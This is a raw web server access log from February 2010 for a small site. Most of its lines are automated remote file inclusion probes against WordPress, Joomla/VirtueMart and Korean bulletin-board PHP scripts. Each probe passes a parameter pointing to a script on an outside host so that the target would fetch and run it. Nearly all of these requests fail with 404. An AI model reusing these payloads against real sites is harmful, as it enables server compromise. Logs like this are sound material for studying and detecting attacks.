77.88.25.28 - - [05/Feb/2010:23:14:55 -0800] "GET /logs/access.log HTTP/1.1" 200 199403 "-" "Yandex/1.01.001 (compatible; Win16; I)" "www.allattitudedoxies.com"
222.73.17.7 - - [05/Feb/2010:23:34:46 -0800] "GET /logs//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://sh-tour.net/dds/bbs/sc1?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "allattitudedoxies.com"
222.73.17.7 - - [05/Feb/2010:23:34:51 -0800] "GET /wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://sh-tour.net/dds/bbs/sc1?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "allattitudedoxies.com"
222.73.17.7 - - [05/Feb/2010:23:34:52 -0800] "GET /logs/access.log%20%20//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://sh-tour.net/dds/bbs/sc1?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "allattitudedoxies.com"
222.73.17.7 - - [05/Feb/2010:23:35:30 -0800] "GET /logs//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://sh-tour.net/dds/bbs/sc1?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "allattitudedoxies.com"
222.73.17.7 - - [05/Feb/2010:23:35:30 -0800] "GET /wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://sh-tour.net/dds/bbs/sc1?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "allattitudedoxies.com"
222.73.17.7 - - [05/Feb/2010:23:35:35 -0800] "GET /logs/access.log%20%20//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://sh-tour.net/dds/bbs/sc1?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "allattitudedoxies.com"
121.88.4.141 - - [05/Feb/2010:23:37:44 -0800] "GET /logs/access.log%20%20//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.kyungilcorp.com/board/data/trashi_/sc1?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "allattitudedoxies.com"
121.88.4.141 - - [05/Feb/2010:23:37:44 -0800] "GET /logs//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.kyungilcorp.com/board/data/trashi_/sc1?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "allattitudedoxies.com"
121.88.4.141 - - [05/Feb/2010:23:37:45 -0800] "GET /wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.kyungilcorp.com/board/data/trashi_/sc1?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "allattitudedoxies.com"
211.108.61.176 - - [06/Feb/2010:00:19:03 -0800] "GET /logs/access.log/bbs/delete_all.php?http://gnu.kimsaem.net/bbs/img/poll_ico.gif?? HTTP/1.1" 404 - "-" "libwww-perl/5.79" "allattitudedoxies.com"
211.108.61.176 - - [06/Feb/2010:00:19:04 -0800] "GET /bbs/delete_all.php?http://gnu.kimsaem.net/bbs/img/poll_ico.gif?? HTTP/1.1" 404 - "-" "libwww-perl/5.79" "allattitudedoxies.com"
211.108.61.176 - - [06/Feb/2010:00:19:05 -0800] "GET /logs/bbs/delete_all.php?http://gnu.kimsaem.net/bbs/img/poll_ico.gif?? HTTP/1.1" 404 - "-" "libwww-perl/5.79" "allattitudedoxies.com"
212.150.147.153 - - [06/Feb/2010:00:48:06 -0800] "GET /comment_modify.php?board_skin_path=http://www.onroadzone.com/zboard/a.gif?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.allattitudedoxies.com"
212.150.147.153 - - [06/Feb/2010:00:48:06 -0800] "GET /logs/access.log%20%20//comment_modify.php?board_skin_path=http://www.onroadzone.com/zboard/a.gif?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.allattitudedoxies.com"
212.150.147.153 - - [06/Feb/2010:00:48:06 -0800] "GET /logs//comment_modify.php?board_skin_path=http://www.onroadzone.com/zboard/a.gif?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.allattitudedoxies.com"
212.150.147.153 - - [06/Feb/2010:00:50:12 -0800] "GET /comment_modify.php?board_skin_path=http://www.onroadzone.com/zboard/a.gif?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.allattitudedoxies.com"
212.150.147.153 - - [06/Feb/2010:00:50:49 -0800] "GET /logs/access.log%20%20//comment_modify.php?board_skin_path=http://www.onroadzone.com/zboard/a.gif?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.allattitudedoxies.com"
212.150.147.153 - - [06/Feb/2010:00:50:49 -0800] "GET /logs//comment_modify.php?board_skin_path=http://www.onroadzone.com/zboard/a.gif?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.allattitudedoxies.com"
212.150.147.153 - - [06/Feb/2010:00:53:50 -0800] "GET /comment_modify.php?board_skin_path=http://www.onroadzone.com/zboard/a.gif?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.allattitudedoxies.com"
212.150.147.153 - - [06/Feb/2010:00:53:50 -0800] "GET /logs//comment_modify.php?board_skin_path=http://www.onroadzone.com/zboard/a.gif?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.allattitudedoxies.com"
212.150.147.153 - - [06/Feb/2010:00:53:50 -0800] "GET /logs/access.log%20%20//comment_modify.php?board_skin_path=http://www.onroadzone.com/zboard/a.gif?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.allattitudedoxies.com"
60.251.165.181 - - [06/Feb/2010:01:35:48 -0800] "GET /components/com_sitemap/sitemap.php?mosConfig_admin_path=http://www.h1cc.net/somd/images/topics/templates/sken/id1(feelcomz).txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "allattitudedoxies.com"
60.251.165.181 - - [06/Feb/2010:01:35:48 -0800] "GET /logs//components/com_sitemap/sitemap.php?mosConfig_admin_path=http://www.h1cc.net/somd/images/topics/templates/sken/id1(feelcomz).txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "allattitudedoxies.com"
60.251.165.181 - - [06/Feb/2010:01:35:48 -0800] "GET /logs/access.log%20%20//components/com_sitemap/sitemap.php?mosConfig_admin_path=http://www.h1cc.net/somd/images/topics/templates/sken/id1(feelcomz).txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "allattitudedoxies.com"
60.251.165.181 - - [06/Feb/2010:01:39:34 -0800] "GET /logs//components/com_sitemap/sitemap.php?mosConfig_admin_path=http://www.h1cc.net/somd/images/topics/templates/sken/id1(feelcomz).txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.allattitudedoxies.com"
60.251.165.181 - - [06/Feb/2010:01:39:34 -0800] "GET /components/com_sitemap/sitemap.php?mosConfig_admin_path=http://www.h1cc.net/somd/images/topics/templates/sken/id1(feelcomz).txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.allattitudedoxies.com"
60.251.165.181 - - [06/Feb/2010:01:39:34 -0800] "GET /logs/access_091002.log%20%20//components/com_sitemap/sitemap.php?mosConfig_admin_path=http://www.h1cc.net/somd/images/topics/templates/sken/id1(feelcomz).txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.allattitudedoxies.com"
95.211.7.129 - - [06/Feb/2010:01:56:31 -0800] "GET /logs///tiny_includes/config.php?dir_ws=http://mya.red-ab.com/ok/cache/tes.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows CE 4.21; rv:1.8b4) Gecko/20050720 Minimo/0.007" "allattitudedoxies.com"
95.211.7.129 - - [06/Feb/2010:01:56:31 -0800] "GET //tiny_includes/config.php?dir_ws=http://mya.red-ab.com/ok/cache/tes.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows CE 4.21; rv:1.8b4) Gecko/20050720 Minimo/0.007" "allattitudedoxies.com"
78.140.138.39 - - [06/Feb/2010:02:08:32 -0800] "GET / HTTP/1.1" 200 924 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.5) Gecko/2008120122 Firefox/3.0.5" "www.allattitudedoxies.com"
219.94.193.152 - - [06/Feb/2010:02:10:42 -0800] "GET /bbs/comment_modify.php?board_skin_path=http://www.hubns.co.kr//data/list/heheh.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.allattitudedoxies.com"
219.94.193.152 - - [06/Feb/2010:02:10:43 -0800] "GET /logs/access.log%20%20//bbs/comment_modify.php?board_skin_path=http://www.hubns.co.kr//data/list/heheh.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.allattitudedoxies.com"
219.94.193.152 - - [06/Feb/2010:02:10:43 -0800] "GET /logs//bbs/comment_modify.php?board_skin_path=http://www.hubns.co.kr//data/list/heheh.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.allattitudedoxies.com"
219.94.193.152 - - [06/Feb/2010:02:11:03 -0800] "GET /logs/access.log%20%20//bbs/comment_modify.php?board_skin_path=http://www.hubns.co.kr//data/list/heheh.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.allattitudedoxies.com"
219.94.193.152 - - [06/Feb/2010:02:11:04 -0800] "GET /bbs/comment_modify.php?board_skin_path=http://www.hubns.co.kr//data/list/heheh.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.allattitudedoxies.com"
219.94.193.152 - - [06/Feb/2010:02:11:04 -0800] "GET /logs//bbs/comment_modify.php?board_skin_path=http://www.hubns.co.kr//data/list/heheh.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.allattitudedoxies.com"
219.94.193.152 - - [06/Feb/2010:02:11:15 -0800] "GET /bbs/comment_modify.php?board_skin_path=http://www.hubns.co.kr//data/list/heheh.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.allattitudedoxies.com"
219.94.193.152 - - [06/Feb/2010:02:11:15 -0800] "GET /logs//bbs/comment_modify.php?board_skin_path=http://www.hubns.co.kr//data/list/heheh.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.allattitudedoxies.com"
219.94.193.152 - - [06/Feb/2010:02:11:16 -0800] "GET /logs/access.log%20%20//bbs/comment_modify.php?board_skin_path=http://www.hubns.co.kr//data/list/heheh.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.allattitudedoxies.com"
125.141.91.138 - - [06/Feb/2010:02:12:57 -0800] "GET /logs/access.log%20%20/delete_comment.php?board_skin_path=http://diskplus.kr/shop/icons/s1.asp??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "allattitudedoxies.com"
125.141.91.138 - - [06/Feb/2010:02:12:57 -0800] "GET /logs/delete_comment.php?board_skin_path=http://diskplus.kr/shop/icons/s1.asp??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "allattitudedoxies.com"
125.141.91.138 - - [06/Feb/2010:02:12:57 -0800] "GET /delete_comment.php?board_skin_path=http://diskplus.kr/shop/icons/s1.asp??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "allattitudedoxies.com"
125.141.91.138 - - [06/Feb/2010:02:13:38 -0800] "GET /delete_comment.php?board_skin_path=http://diskplus.kr/shop/icons/s1.asp??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "allattitudedoxies.com"
125.141.91.138 - - [06/Feb/2010:02:13:39 -0800] "GET /logs/access.log%20%20/delete_comment.php?board_skin_path=http://diskplus.kr/shop/icons/s1.asp??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "allattitudedoxies.com"
125.141.91.138 - - [06/Feb/2010:02:13:39 -0800] "GET /logs/delete_comment.php?board_skin_path=http://diskplus.kr/shop/icons/s1.asp??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "allattitudedoxies.com"
125.141.91.138 - - [06/Feb/2010:02:36:36 -0800] "GET //administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://diskplus.kr/shop/icons/s1.asp??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "allattitudedoxies.com"
125.141.91.138 - - [06/Feb/2010:02:36:36 -0800] "GET /logs///administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://diskplus.kr/shop/icons/s1.asp??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "allattitudedoxies.com"
125.141.91.138 - - [06/Feb/2010:02:36:36 -0800] "GET /logs/access.log%20%20///administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://diskplus.kr/shop/icons/s1.asp??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "allattitudedoxies.com"
125.141.91.138 - - [06/Feb/2010:02:38:33 -0800] "GET /logs///administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://diskplus.kr/shop/icons/s1.asp??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "allattitudedoxies.com"
125.141.91.138 - - [06/Feb/2010:02:38:33 -0800] "GET //administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://diskplus.kr/shop/icons/s1.asp??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "allattitudedoxies.com"
125.141.91.138 - - [06/Feb/2010:02:38:33 -0800] "GET /logs/access.log%20%20///administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://diskplus.kr/shop/icons/s1.asp??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "allattitudedoxies.com"
222.237.78.176 - - [06/Feb/2010:03:26:32 -0800] "GET /contact.php?//good.php?board_skin_path=%20good.phphttp://mya.red-ab.com/ok/cache/tes.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20051219 SeaMonkey/1.0b" "allattitudedoxies.com"
222.237.78.176 - - [06/Feb/2010:03:26:32 -0800] "GET /logs/contact.php?//good.php?board_skin_path=%20good.phphttp://mya.red-ab.com/ok/cache/tes.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20051219 SeaMonkey/1.0b" "allattitudedoxies.com"
67.218.116.130 - - [06/Feb/2010:03:56:49 -0800] "GET /robots.txt HTTP/1.0" 404 - "-" "Mozilla/5.0 (Twiceler-0.9 http://www.cuil.com/twiceler/robot.html)" "allattitudedoxies.com"
222.237.78.176 - - [06/Feb/2010:04:03:57 -0800] "GET //administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://mya.red-ab.com/ok/cache/tes.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20051219 SeaMonkey/1.0b" "www.allattitudedoxies.com"
222.237.78.176 - - [06/Feb/2010:04:03:58 -0800] "GET /logs///administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://mya.red-ab.com/ok/cache/tes.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20051219 SeaMonkey/1.0b" "www.allattitudedoxies.com"
211.192.139.164 - - [06/Feb/2010:04:04:23 -0800] "GET /logs/access.log%20%20//?_SERVER[DOCUMENT_ROOT]=http://suzuki6.fileave.com/zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "allattitudedoxies.com"
211.192.139.164 - - [06/Feb/2010:04:04:23 -0800] "GET /?_SERVER[DOCUMENT_ROOT]=http://suzuki6.fileave.com/zfxid1.txt? HTTP/1.1" 200 924 "-" "Mozilla/5.0" "allattitudedoxies.com"
211.192.139.164 - - [06/Feb/2010:04:04:23 -0800] "GET /logs//?_SERVER[DOCUMENT_ROOT]=http://suzuki6.fileave.com/zfxid1.txt? HTTP/1.1" 200 1515 "-" "Mozilla/5.0" "allattitudedoxies.com"
211.192.139.164 - - [06/Feb/2010:04:06:39 -0800] "GET /?_SERVER[DOCUMENT_ROOT]=http://suzuki6.fileave.com/zfxid1.txt? HTTP/1.1" 200 924 "-" "Mozilla/5.0" "allattitudedoxies.com"
211.192.139.164 - - [06/Feb/2010:04:06:39 -0800] "GET /logs/access.log%20%20//?_SERVER[DOCUMENT_ROOT]=http://suzuki6.fileave.com/zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "allattitudedoxies.com"
211.192.139.164 - - [06/Feb/2010:04:06:39 -0800] "GET /logs//?_SERVER[DOCUMENT_ROOT]=http://suzuki6.fileave.com/zfxid1.txt? HTTP/1.1" 200 1515 "-" "Mozilla/5.0" "allattitudedoxies.com"
222.237.78.176 - - [06/Feb/2010:04:07:31 -0800] "GET //good.php?board_skin_path=http://mya.red-ab.com/ok/cache/tes.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20051219 SeaMonkey/1.0b" "allattitudedoxies.com"
222.237.78.176 - - [06/Feb/2010:04:07:31 -0800] "GET /logs///good.php?board_skin_path=http://mya.red-ab.com/ok/cache/tes.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20051219 SeaMonkey/1.0b" "allattitudedoxies.com"
222.237.78.176 - - [06/Feb/2010:04:18:40 -0800] "GET /logs/about.php?SERVER[DOCUMENT_ROOT]=http://mya.red-ab.com/ok/cache/tes.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20051219 SeaMonkey/1.0b" "allattitudedoxies.com"
222.237.78.176 - - [06/Feb/2010:04:18:40 -0800] "GET /about.php?SERVER[DOCUMENT_ROOT]=http://mya.red-ab.com/ok/cache/tes.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20051219 SeaMonkey/1.0b" "allattitudedoxies.com"
211.192.139.164 - - [06/Feb/2010:04:19:07 -0800] "GET /?_SERVER[DOCUMENT_ROOT]=http://suzuki6.fileave.com/zfxid1.txt? HTTP/1.1" 200 924 "-" "Mozilla/5.0" "allattitudedoxies.com"
211.192.139.164 - - [06/Feb/2010:04:19:07 -0800] "GET /logs/access.log%20%20//?_SERVER[DOCUMENT_ROOT]=http://suzuki6.fileave.com/zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "allattitudedoxies.com"
211.192.139.164 - - [06/Feb/2010:04:19:07 -0800] "GET /logs//?_SERVER[DOCUMENT_ROOT]=http://suzuki6.fileave.com/zfxid1.txt? HTTP/1.1" 200 1515 "-" "Mozilla/5.0" "allattitudedoxies.com"
77.88.25.28 - - [06/Feb/2010:04:43:57 -0800] "GET /logs/ HTTP/1.1" 200 1510 "-" "Yandex/1.01.001 (compatible; Win16; I)" "www.allattitudedoxies.com"
211.192.139.164 - - [06/Feb/2010:05:08:53 -0800] "GET /logs/access.log%20%20//setup.php?dir=http://sisi123.fileave.com/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.allattitudedoxies.com"
211.192.139.164 - - [06/Feb/2010:05:08:53 -0800] "GET /logs//setup.php?dir=http://sisi123.fileave.com/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.allattitudedoxies.com"
211.192.139.164 - - [06/Feb/2010:05:08:53 -0800] "GET /setup.php?dir=http://sisi123.fileave.com/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.allattitudedoxies.com"
211.192.139.164 - - [06/Feb/2010:05:11:35 -0800] "GET /logs/access.log%20%20//setup.php?dir=http://sisi123.fileave.com/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.allattitudedoxies.com"
211.192.139.164 - - [06/Feb/2010:05:11:35 -0800] "GET /logs//setup.php?dir=http://sisi123.fileave.com/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.allattitudedoxies.com"
211.192.139.164 - - [06/Feb/2010:05:11:35 -0800] "GET /setup.php?dir=http://sisi123.fileave.com/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.allattitudedoxies.com"
74.50.85.229 - - [06/Feb/2010:05:13:45 -0800] "GET /logs/administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "allattitudedoxies.com"
74.50.85.229 - - [06/Feb/2010:05:13:45 -0800] "GET /logs/access.log%20%20/administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "allattitudedoxies.com"
74.50.85.229 - - [06/Feb/2010:05:13:45 -0800] "GET /administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "allattitudedoxies.com"
74.50.85.229 - - [06/Feb/2010:05:14:12 -0800] "GET /logs/administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "allattitudedoxies.com"
74.50.85.229 - - [06/Feb/2010:05:14:12 -0800] "GET /administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "allattitudedoxies.com"
74.50.85.229 - - [06/Feb/2010:05:14:12 -0800] "GET /logs/access.log%20%20/administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.0" 404 - "-" "Mozilla/5.0" "allattitudedoxies.com"
58.150.99.131 - - [06/Feb/2010:05:14:42 -0800] "GET /logs/access.log%20%20/administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "allattitudedoxies.com"
58.150.99.131 - - [06/Feb/2010:05:14:42 -0800] "GET /logs/administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "allattitudedoxies.com"
58.150.99.131 - - [06/Feb/2010:05:14:42 -0800] "GET /administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "allattitudedoxies.com"
211.192.139.164 - - [06/Feb/2010:05:15:44 -0800] "GET /logs/access.log%20%20//setup.php?dir=http://sisi123.fileave.com/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.allattitudedoxies.com"
211.192.139.164 - - [06/Feb/2010:05:15:44 -0800] "GET /logs//setup.php?dir=http://sisi123.fileave.com/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.allattitudedoxies.com"
211.192.139.164 - - [06/Feb/2010:05:15:44 -0800] "GET /setup.php?dir=http://sisi123.fileave.com/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.allattitudedoxies.com"
72.241.52.111 - - [06/Feb/2010:05:16:05 -0800] "GET /administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "allattitudedoxies.com"
72.241.52.111 - - [06/Feb/2010:05:16:08 -0800] "GET /logs/access.log%20%20/administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "allattitudedoxies.com"
72.241.52.111 - - [06/Feb/2010:05:16:10 -0800] "GET /logs/administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "allattitudedoxies.com"
211.192.139.164 - - [06/Feb/2010:05:16:14 -0800] "GET /setup.php?dir=http://sisi123.fileave.com/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.allattitudedoxies.com"
211.192.139.164 - - [06/Feb/2010:05:16:14 -0800] "GET /logs//setup.php?dir=http://sisi123.fileave.com/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.allattitudedoxies.com"
211.192.139.164 - - [06/Feb/2010:05:16:14 -0800] "GET /logs/access.log%20%20//setup.php?dir=http://sisi123.fileave.com/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.allattitudedoxies.com"
125.141.91.138 - - [06/Feb/2010:05:17:15 -0800] "GET ///delete_all.php?board_skin_path=http://www.hubns.co.kr//data/list/heheh.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "allattitudedoxies.com"
125.141.91.138 - - [06/Feb/2010:05:17:16 -0800] "GET /logs////delete_all.php?board_skin_path=http://www.hubns.co.kr//data/list/heheh.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "allattitudedoxies.com"
125.141.91.138 - - [06/Feb/2010:05:17:16 -0800] "GET /logs/access.log%20%20////delete_all.php?board_skin_path=http://www.hubns.co.kr//data/list/heheh.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "allattitudedoxies.com"
58.150.99.131 - - [06/Feb/2010:05:17:37 -0800] "GET /administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "allattitudedoxies.com"
58.150.99.131 - - [06/Feb/2010:05:17:37 -0800] "GET /logs/administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "allattitudedoxies.com"
58.150.99.131 - - [06/Feb/2010:05:17:42 -0800] "GET /logs/access.log%20%20/administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "allattitudedoxies.com"
58.150.99.131 - - [06/Feb/2010:05:17:54 -0800] "GET /logs/access.log%20%20/administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "allattitudedoxies.com"
58.150.99.131 - - [06/Feb/2010:05:17:54 -0800] "GET /logs/administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "allattitudedoxies.com"
58.150.99.131 - - [06/Feb/2010:05:17:58 -0800] "GET /administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "allattitudedoxies.com"
66.103.128.44 - - [06/Feb/2010:05:22:18 -0800] "GET /components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute.path=http://www.sarpifirenze.it/media/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "allattitudedoxies.com"
66.103.128.44 - - [06/Feb/2010:05:22:18 -0800] "GET /logs//components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute.path=http://www.sarpifirenze.it/media/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "allattitudedoxies.com"
66.103.128.44 - - [06/Feb/2010:05:22:18 -0800] "GET /logs/access.log%20%20//components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute.path=http://www.sarpifirenze.it/media/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "allattitudedoxies.com"
125.141.91.138 - - [06/Feb/2010:05:23:43 -0800] "GET /logs////delete_all.php?board_skin_path=http://www.hubns.co.kr//data/list/heheh.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "allattitudedoxies.com"
125.141.91.138 - - [06/Feb/2010:05:23:44 -0800] "GET ///delete_all.php?board_skin_path=http://www.hubns.co.kr//data/list/heheh.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "allattitudedoxies.com"
125.141.91.138 - - [06/Feb/2010:05:23:44 -0800] "GET /logs/access.log%20%20////delete_all.php?board_skin_path=http://www.hubns.co.kr//data/list/heheh.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "allattitudedoxies.com"
125.141.91.138 - - [06/Feb/2010:05:24:05 -0800] "GET /logs/access.log%20%20////delete_all.php?board_skin_path=http://www.hubns.co.kr//data/list/heheh.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "allattitudedoxies.com"
125.141.91.138 - - [06/Feb/2010:05:24:05 -0800] "GET /logs////delete_all.php?board_skin_path=http://www.hubns.co.kr//data/list/heheh.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "allattitudedoxies.com"
125.141.91.138 - - [06/Feb/2010:05:24:06 -0800] "GET ///delete_all.php?board_skin_path=http://www.hubns.co.kr//data/list/heheh.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "allattitudedoxies.com"
61.78.109.87 - - [06/Feb/2010:05:34:30 -0800] "GET /administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "allattitudedoxies.com"
61.78.109.87 - - [06/Feb/2010:05:34:30 -0800] "GET /logs/access.log%20%20/administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "allattitudedoxies.com"
61.78.109.87 - - [06/Feb/2010:05:34:37 -0800] "GET /logs/administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "allattitudedoxies.com"
